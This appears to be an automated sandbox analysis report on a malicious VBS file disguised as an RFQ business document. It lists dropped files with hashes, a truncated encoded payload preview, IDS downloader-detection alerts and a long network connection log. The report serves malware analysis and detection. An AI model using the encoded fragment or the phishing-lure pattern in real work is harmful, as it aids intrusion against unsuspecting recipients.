                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                Malicious:false
                                                                Preview:@...e.................................X..............@..........
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):468648
                                                                Entropy (8bit):5.960346043198841
                                                                Encrypted:false
                                                                SSDEEP:12288:EHjklp1rb6EhweE0mJnAyPVnkILBoHCmHn:Eo1GEho0mJndlFoimH
                                                                MD5:6C3535EA9B4897F4B559EE0A594E0CA0
                                                                SHA1:CFF410B1EDFCB771F099D0D72FDA6965062D391B
                                                                SHA-256:20DD00DF5F01CBFA8EEA785A01EA06073D95409EF8BC0035B6E157F1EC0DCDA8
                                                                SHA-512:62DD8EED77C62F03ADA250C901FDB160881DB163BC99D391B36B4E3B242739F8927952697CAB788CD3EE611A9D74F1DA2E41526A1206F9955149C0A0BE16BC40
                                                                Malicious:false
                                                                Preview:6wL4J+sChyi7xZQXAHEBm+sCk70DXCQEcQGbcQGbubgAoE1xAZvrAuFygfEpganX6wLQyesCNASBwW9+9mXrAs/0cQGb6wLnoHEBm7rDZtTl6wII6nEBm+sC1Y1xAZsxynEBm3EBm4kUC+sCu0hxAZvR4nEBm+sCsjKDwQRxAZtxAZuB+fsNMAR8zXEBm+sCmlqLRCQEcQGbcQGbicNxAZvrAncxgcOj2J4D6wLkYusCFdS6dWFL/XEBm+sCGEOB8txIQEhxAZvrAol7gcJX1vRK6wK7JnEBm+sCWd7rAqZB6wJATXEBm4sMEOsCkppxAZuJDBNxAZvrAuMdQusCTPZxAZuB+jDjBAB11XEBm+sCFmCJXCQMcQGbcQGbge0AAwAAcQGb6wJBqotUJAhxAZvrAjn8i3wkBHEBm+sCn+qJ6+sCoudxAZuBw5wAAABxAZtxAZtTcQGb6wJgFmpAcQGbcQGbievrAkH2cQGbx4MAAQAAALBKBHEBm3EBm4HDAAEAAHEBm+sCIdhT6wIKvesCLzSJ6+sC+EZxAZuJuwQBAADrAjTf6wIWioHDBAEAAHEBm3EBm1PrAn0C6wJfTGr/6wLChOsCYd+DwgXrAjnZcQGbMfbrAoTz6wK2nzHJ6wKpGXEBm4sacQGbcQGbQesCGxVxAZs5HAp18+sCoQxxAZtG6wLauusCuAiAfAr7uHXc6wJnJXEBm4tECvzrAmvUcQGbKfDrAjcv6wI+xP/ScQGbcQGbujDjBADrAj2qcQGbMcDrAnbP6wLbgIt8JAzrAozi6wKWi4E0B8Eai7frAm/tcQGbg8AEcQGb6wL7IjnQdeRxAZtxAZuJ+3EBm3EBm//X6wKyJOsCv9YpGYu3wXwOf6efWOxF0g9ASP8CMozldEh5QfRB/h+BVM2jvliowzayt+2uDOjeADKM5XRIlJNuDk4BAhv52wpG6Vn0PkTACkbb5YwBp+1NbuabYhJm6xhwhReL6rPGNza1
                                                                File type:ASCII text, with CRLF line terminators
                                                                Entropy (8bit):5.020386145937456
                                                                TrID:
                                                                • Visual Basic Script (13500/0) 100.00%
                                                                File name:#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
                                                                File size:102'856 bytes
                                                                MD5:1720cb49814844901b663405cb868b7d
                                                                SHA1:fcc41b466e5f919f302ab92bf5305b7ee3cce8b6
                                                                SHA256:45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706
                                                                SHA512:09c59ece35924a6a541f0f1882095daa798a86ac5906b458b8e40be4c376438c96ba48735b9c791f587b756163d6379c46839f51bbf70aba438be4f130674e79
                                                                SSDEEP:1536:Q5OsFjaZ2SsU/XWjP1cpNIbfOZUnihJvDz05fPFGK1q61voBKp:WOWo3ujP+p6sYihJ7ufdGKl
                                                                TLSH:7DA3727D951C011F098FDA95B860B5E38FE9B009C13B2071EE9EDA4F50CB66C7E6A50E
                                                                File Content Preview:..'Nontrading; paddymelon..'Throughways reslogen; lygaeidae..'Typificerer, overhandling;....'Gourmander psychologist: alliaceous heuvel:....'Arbejdedes skyggende unsecurely! afmagres:..'Volksraad. soldans moaner..'Orgiasme! felinae; gravhund,..'Tilsatsen.
                                                                Icon Hash:68d69b8f86ab9a86
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-10T09:28:20.277176+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749969142.250.186.142443TCP
                                                                2024-10-10T09:28:25.558303+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749975132.226.8.16980TCP
                                                                2024-10-10T09:28:27.727335+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749975132.226.8.16980TCP
                                                                2024-10-10T09:28:28.330088+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749980188.114.97.3443TCP
                                                                2024-10-10T09:28:29.323950+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749981132.226.8.16980TCP
                                                                2024-10-10T09:28:30.919057+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749982188.114.97.3443TCP
                                                                2024-10-10T09:28:35.044908+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749986188.114.97.3443TCP
                                                                2024-10-10T09:28:38.272046+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749990188.114.97.3443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 10, 2024 09:27:40.924231052 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:40.924298048 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:40.924382925 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:40.931585073 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:40.931616068 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.567997932 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.568073988 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.569538116 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.569598913 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.576680899 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.576694965 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.577044964 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.615120888 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.655400991 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.962816000 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.963565111 CEST44349737142.250.186.142192.168.2.7
                                                                Oct 10, 2024 09:27:41.963629007 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.967111111 CEST49737443192.168.2.7142.250.186.142
                                                                Oct 10, 2024 09:27:41.976690054 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:41.976732016 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:41.976866007 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:41.977219105 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:41.977236986 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:42.613065004 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:42.613147020 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:42.615036011 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:42.615041971 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:42.615423918 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:42.616333008 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:42.663394928 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.035845041 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.036001921 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.041974068 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.042105913 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.054672956 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.054805040 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.054821014 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.105031967 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.105051041 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.122304916 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.122332096 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.122376919 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.122386932 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.122497082 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.124527931 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.130821943 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.130851984 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.130888939 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.130897045 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.130939007 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.136990070 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.143203974 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.143263102 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.143286943 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.143301010 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.143341064 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.149561882 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.155865908 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.155905962 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.155924082 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.155937910 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.155992985 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.161994934 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.167803049 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.167838097 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.167865038 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.167891979 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.167933941 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.173499107 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.179686069 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.179723978 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.179776907 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.179785967 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.179831028 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.185317039 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.190718889 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.190773964 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.190783978 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.208781004 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.208821058 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.208849907 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.208852053 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.208861113 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.208895922 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.210174084 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.210227013 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.210233927 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.216059923 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.216089964 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.216118097 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.216125011 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.216171980 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.221460104 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.226860046 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.226888895 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.226916075 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.226922035 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.226958036 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.231858015 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.236783981 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.236814022 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.236911058 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.236927986 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.236973047 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.241473913 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.247572899 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.247602940 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.247642040 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.247658014 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.247699022 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.251707077 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.256170988 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.256226063 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.256234884 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.256253004 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.256292105 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.259901047 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.264471054 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.264534950 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.264535904 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.264544964 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.264584064 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.268887997 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.272986889 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.273021936 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.273046970 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.273052931 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.273091078 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.273096085 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.278265953 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.278326988 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.278332949 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.281789064 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.281862020 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.281868935 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.285790920 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.285845041 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.285851002 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.289295912 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.289354086 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.289360046 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.292938948 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.292999029 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.293004990 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.296715021 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.296766996 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.296773911 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.299700975 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.299756050 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.299763918 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.306193113 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.306221962 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.306247950 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.306282043 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.306288004 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.306318045 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.308018923 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.308082104 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.308088064 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.309921980 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.309982061 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.309987068 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.312391996 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.312457085 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.312463045 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.314062119 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.314116001 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.314121008 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.317157984 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.317209005 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.317214012 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.318548918 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.318599939 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.318605900 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.321012020 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.321064949 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.321070910 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.323035955 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.323084116 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.323090076 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.325203896 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.325253963 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.325259924 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.326575041 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.326628923 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.326634884 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.329288006 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.329343081 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.329353094 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.331218004 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.331288099 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.331294060 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.333702087 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.333754063 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.333760977 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.335206985 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.335259914 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.335266113 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.340008020 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.340044975 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.340070009 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.340075970 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.340112925 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.340117931 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.342269897 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.342324972 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.342330933 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.344180107 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.344234943 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.344239950 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.345411062 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.345458984 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.345464945 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.347413063 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.347470045 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.347476006 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.349526882 CEST44349747142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:27:45.349582911 CEST49747443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:27:45.349589109 CEST44349747142.250.185.161192.168.2.7
